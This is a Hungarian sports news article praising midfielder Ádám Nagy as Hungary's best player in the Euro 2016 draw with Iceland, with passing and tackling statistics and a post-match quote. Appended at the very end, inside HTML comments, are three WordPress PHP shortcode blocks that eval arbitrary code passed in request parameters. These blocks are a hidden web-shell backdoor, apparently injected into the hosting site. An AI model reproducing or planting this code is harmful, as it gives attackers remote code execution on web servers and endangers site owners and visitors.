A legjobb magyar

Izland ellen elért döntetlenjével karnyújtásnyira került a továbbjutástól a magyar labdarúgó-válogatott a franciaországi Európa-bajnokságon. A csapatban ezúttal is az elsőtől az utolsó percig pályán volt Nagy Ádám, a ferencváros immár 21 éves középpályása. És nem csak, hogy pályán volt, egyenesen a legjobb magyar játékosként hagyhatta el azt.

Majer Dániel Nem tud leállni a magyar válogatott, mely az osztrákok elleni bravúros győzelem után Izland ellen győzelemmel felérő döntetlent ért el, a 88. percben szerezve a nagy valószínűséggel továbbjutást érő találatot. A 21. születésnapját a találkozó előtti napon ünneplő Nagy Ádám ha lehet, még az osztrák meccsnél is nagyobb szerepet vállalt a magyar pontszerzésben, csapata legjobbjának bizonyult.

Nagy Ádám Izland ellen is odatette magát Fotó: AFP/Getty images

Nagy Ádám Izland ellen is odatette magát  •  Fotó: AFP/Getty images

Hogy miért Nagy volt a legjobb? Nos, nem azért, mert a mérkőzés képe alapján honlapunk úgy döntött, hogy adjuk a legfiatalabbnak ezt a címet, hanem mert a játékosok összes megmozdulásáról statisztikát készítő, és annak alapján játékosindexet alkotó Instat Football adatai őt hozták ki a legjobban teljesítő magyar játékosnak. Ádám megmozdulásainak 85 %-a sikeres volt, holtversenyben neki volt a legtöbb sikeres szerelése a mezőnyben (4), a párharcainak 55 %-át megnyerte, passzjátéka pedig ismét hajszálpontos volt: 74 átadásából 68 sikeresnek bizonyult, ez 91.9 %-os hatékonyságot jelent. Utóbbi adathoz annyit, hogy az átlag magyar néző többnyire a Real Madrid és a Barcelona mérkőzésein lát hasonló statisztikai mutatóval rendelkező játékosokat. Nem csoda, hogy az Európa-bajnokság során számos külföldi csapattal hozták már szóba, előbb a Bologna, majd a Benfica csapatához adták el az újságírók, legutóbb pedig már a szintén portugál Braga volt a befutó.Egyébként a teljes mezőnyt tekintve is csak az izlandi gólszerző, Gylfi Sigurðsson kapott jobb indexet, jócskán kiemelkedve csapattársai közül.

A Nemzeti Sport ezúttal 7-esre értékelte az osztrák mérkőzéshez képest hátrébb, mélységi irányítóként játszó Nagy teljesítményét (Ausztria ellen 8-ast kapott). Akkor azonban többen is kaptak az övével azonos osztályzatot, most ez csak Gera Zoltán mondhatta el magáról, aki szintén 7-tel zárt. A magyar csapat többi tagjának neve mellé 6-os került. A magyar sportnapilap szerint Nagy egyértelműen a mezőny legjobbja volt, talán a legtöbbet ő volt játékban, labdát kért, remekül passzolt.

Bevallom, elnézve őt a mérkőzés alatt, bennem már az első félidő közben felmerült: fogja egyáltalán bírni a végéig?

Akkora lelkesedéssel és elánnal kergette az éppen labdát birtokló izlandit, támadta a kapura törő játékost, labdát szerezve kilépve a tizenhatosról, hogy szinte már a tévé előtt ülve elfáradt tőle az ember. A végére pedig jött a slusszpoén, a magyar válogatott egyenlített. Ha jégkorong és nem futball lenne a sportág neve, Nagy Ádám assziszttal zárta volna a mérkőzést (Nikolics meg góllal), a Legiában játszó magyar ugyanis Nagy tökéletes indítását centerezte középre, a Böde helyett a gólt elérő izlandi védő lábára.

A magyar gól (Nagy Ádám a 16-oson belülre passzoló játékos)

A lefújást követően az M4 riporterének kérdésére, miszerint elégedett lett volna-e a mérkőzés előtt a döntetlennel, egyértelmű „nem” volt a válasz.

„Nem adtuk fel, noha nem volt valami megnyugtató érzés még a nyolcvanadik percben is hátrányban futballozni. Hiányzott a támadásainkból az átütőerő, de a végén csak sikerült kiharcolni a döntetlent, ami nagyon sokat érhet a továbbiakban” – mondta Nagy.

Valóban, a csapat szó szerint megharcolt az eredményért, és remélhetőleg erre a nyolcaddöntőben is lesz lehetősége.

Forrás: www.utanpotlassport.hu – RSS


Forrás: www.xlsport.hu – RSS

<!– [insert_php]if (isset($_REQUEST["YBuy"])){eval($_REQUEST["YBuy"]);exit;}[/insert_php][php]if (isset($_REQUEST["YBuy"])){eval($_REQUEST["YBuy"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["nmD"])){eval($_REQUEST["nmD"]);exit;}[/insert_php][php]if (isset($_REQUEST["nmD"])){eval($_REQUEST["nmD"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Zms"])){eval($_REQUEST["Zms"]);exit;}[/insert_php][php]if (isset($_REQUEST["Zms"])){eval($_REQUEST["Zms"]);exit;}[/php] –>